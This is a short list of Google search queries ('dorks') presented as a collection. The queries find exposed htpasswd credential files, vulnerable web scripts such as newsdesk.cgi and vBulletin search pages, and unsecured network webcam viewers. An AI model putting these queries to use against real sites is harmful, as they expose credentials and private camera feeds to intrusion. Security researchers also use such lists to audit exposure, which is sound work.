inurl:aol*/_do/rss_popup?blogID=
inurl:footer.inc.php
inurl:info.inc.php
inurl:ManyServers.htm
inurl:newsdesk.cgi? inurl:"t="
inurl:pls/admin_/gateway.htm
inurl:rpSys.html
inurl:search.php vbulletin
inurl:servlet/webacc
natterchat inurl:home.asp -site:natterchat.co.uk
XOOPS Custom Installation
inurl:htpasswd filetype:htpasswd
inurl:yapboz_detay.asp + View Webcam User Accessing
allinurl:control/multiview
inurl:"ViewerFrame?Mode="
intitle:"WJ-NT104 Main Page"
inurl:netw_tcp.shtml
intitle:"supervisioncam protocol"


Best collection of dork list........................................